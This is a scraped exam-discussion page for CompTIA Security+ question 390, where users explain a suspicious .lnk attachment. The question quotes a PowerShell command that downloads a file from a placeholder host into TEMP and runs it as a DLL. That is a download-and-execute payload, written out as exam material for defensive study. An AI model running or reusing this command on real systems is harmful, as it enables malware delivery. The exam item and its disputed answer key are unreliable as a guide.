ExamTopics Logo
Mail Us[email protected]
Menu
Comptia Discussions
exam questions

Exam SY0-601 All Questions

View all questions & answers for the SY0-601 exam
Go to Exam

Exam SY0-601 topic 1 question 390 discussion

Actual exam question from CompTIA's SY0-601
Question #: 390
Topic #: 1
[All SY0-601 Questions]

An employee received an email with an unusual file attachment named Updates.lnk. A security analyst is reverse engineering what the file does and finds that it executes the following script:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -URI https://somehost.com/04EB18.jpg -OutFile $env:TEMP\autoupdate.dll;Start-Process rundl132.exe $env:TEMP\autoupdate.dll

Which of the following BEST describes what the analyst found?

  • A. A PowerShell code is performing a DLL injection.
  • B. A PowerShell code is displaying a picture.
  • C. A PowerShell code is configuring environmental variables.
  • D. A PowerShell code is changing Windows Update settings.
Show Suggested Answer Hide Answer
Suggested Answer: A 🗳️
by sdc939 at Feb. 13, 2023, 9:08 a.m.

Comments

Chosen Answer:
This is a voting comment (?). It is better to Upvote an existing comment if you don't have anything to add.
Switch to a voting comment New
Submit Cancel
ApplebeesWaiter1122
Highly Voted 1 year, 11 months ago
Selected Answer: A
A PowerShell code is performing a DLL injection. The given script executes a PowerShell command that downloads a file from the specified URI (https://somehost.com/04EB18.jpg) and saves it as autoupdate.dll in the temporary folder ($env:TEMP). It then launches the rundl132.exe process to load and execute the downloaded DLL file. This technique is commonly used in DLL injection attacks, where malicious code is injected into a legitimate process to gain unauthorized access or perform malicious activities on a system.
upvoted 26 times
JarnBarn
1 year, 5 months ago
Applebees bebe be the real MVP
upvoted 3 times
...
Abdulaa
1 year, 9 months ago
that was a good explination,THX
upvoted 1 times
...
ID77
1 year, 3 months ago
Thanks Applebees!
upvoted 1 times
...
...
Ufuk_Ari
Highly Voted 2 years, 3 months ago
Selected Answer: A
A. Remote server using PowerShell and saving it as "autoupdate.dll" in the user's temporary folder. It then executes the file using the "rundll32.exe" program, which suggests that the file is being used to perform some sort of malicious activity.
upvoted 8 times
Zdane
2 years ago
You are correct! But as a another layer of confusion, the question states "rundl132.exe" program...
upvoted 1 times
benni3c
1 year, 9 months ago
I wish they were all like this, it has dll at the end: TEMP\autoupdate.dll
upvoted 2 times
...
...
...
chiachuang
Most Recent 1 year, 7 months ago
Selected Answer: A
A PowerShell code is performing a DLL injection.
upvoted 1 times
...
Zaak
2 years, 2 months ago
Selected Answer: A
Absolutely 💯
upvoted 4 times
...
sdc939
2 years, 3 months ago
Selected Answer: A
A. A PowerShell code is performing a DLL injection.
upvoted 3 times
...
Community vote distribution
A (35%)
C (25%)
B (20%)
Other
Most Voted
A voting comment increases the vote count for the chosen answer by one.

Upvoting a comment with a selected answer will also increase the vote count towards that answer by one. So if you see a comment that you already agree with, you can upvote it instead of posting a new comment.

SaveCancel